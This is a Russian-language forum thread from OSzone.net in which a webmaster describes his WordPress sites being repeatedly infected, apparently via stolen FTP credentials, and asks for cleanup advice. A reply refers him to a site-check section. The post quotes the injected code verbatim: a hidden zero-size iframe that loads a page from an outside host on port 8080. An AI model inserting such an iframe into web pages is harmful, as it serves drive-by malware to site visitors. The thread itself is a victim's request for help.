|
|
|
|
| Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Не могу вылечиться от HTML:Illiframe-D [Trj и что теперь делать? |
|
|
Не могу вылечиться от HTML:Illiframe-D [Trj и что теперь делать?
|
|
Новый участник Сообщения: 1 |
Ситуация следующая: несколько дней назад вирусом были заражены все мои сайты (на нескольких хостингах). Код вируса записывался к конец файлов (в основном только файлов с названием index.*). Выглядел примерно следующим образом:
<iframe frameborder="0" onload="if (!this.src){ this.src='http://iq-mozgi.ru:8080/index.php'; this.height='0'; this.width='0';}" >vomfhwifyuxyvbppdqqmcsxjdloumov</iframe> Аваст определяет HTML:Illiframe-D [Trj]. Сначала я почистил все файлы с такой строкой (и пододными строками, их было несколько вариантов) и все вроде как наладилось. На следующий день у меня снова все сайты были заражены. Тут я понял, что зря я хранил пароли введенными в total commander. Чтобы избавиться от вируса, я сначала поменял все пароли, удалил фтп соединения из тотала, снова почистил хост. Все опять наладилось, но уже на следующий день снова все сайты заражены. В чем же дело - я же уже не сохранял пароли? А может вирус прописался в пределах сайта, чтобы самовосстанавливаться? ЧТо касается безопасности, то перед первым заражением у меня стояла бесплатная версия Avira (которая регулярно обновляется), затем в дополнение к Avira я поставил Avast, проверил им комп, он вроде как убил вирусы, но как видимо - не все. Система WinXP SP3 (обновления отключены) Еще один момент - когда запускаю вебмани (и еще в некоторых случаях) сейчас (после установки аваста), Avira ругается на обнаружение вируса TR/Crypt.XPACK.Gen, но показывает, что он находится в файле C:\WINDOWS\Temp\_avast4_\unp174722536.tmp. Итак, на данный момент я принял решение, что нужно переставить винду (перед этим отформатировав все диски), затем поставить нормальный антивирус и файервол и в дальнейшем не сохранять фтп пароли введенными. Что касается сайтов - то посносить их и восстановить записи из БД (у меня все в основном на вордпрессе). От вас жду: 1. Советов по поводу правильности моего решения (и эффективности на будущее) 2. Советов, какие антивирь и файервол лучше установить, и вообще как граммотно восстановить безопасность в данном случае? p.s. и еще меня очень настораживает момент, что после смены паролей (при том что они не сохранялись в фтп клиенте) - вирус их все-таки украл (конечно, если на сайтах просто не остался самовосстанавливающийся вирусный код) |
|
|
Отправлено: 11:47, 04-11-2009 |
Будем жить, Маэстро... Сообщения: 6694
|
Профиль | Сайт | Отправить PM | Цитировать loftiplamar, Попробуйте с проверкой сайта на вирусы обратиться сюда - Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте тут
|
|
------- Отправлено: 16:00, 04-11-2009 | #2 |
|
Участник сейчас на форуме |
 |
Участник вне форума |
 |
Автор темы |
 |
Сообщение прикреплено |
| |||||
| Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
| Прочее - С Ubuntu - на Windows. В интернет теперь выйти не могу! | Valery- | Общий по Linux | 2 | 18-06-2009 18:12 | |
| Да,лопухнулся...а че теперь делать? | Kranmaster | Ноутбуки | 26 | 21-11-2007 09:11 | |
| [решено] Не возможно вылечиться от вируса Banker-CUU[Trj] | SimSim | Лечение систем от вредоносных программ | 8 | 21-11-2007 01:06 | |
| Не могу скачать файл с ftp. Что делать? | AlexanderS2004 | Хочу все знать | 3 | 23-08-2004 15:17 | |
|
|
Время: 17:05. | © OSzone.net 2001-
|
|
Powered by: vBulletin Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. |
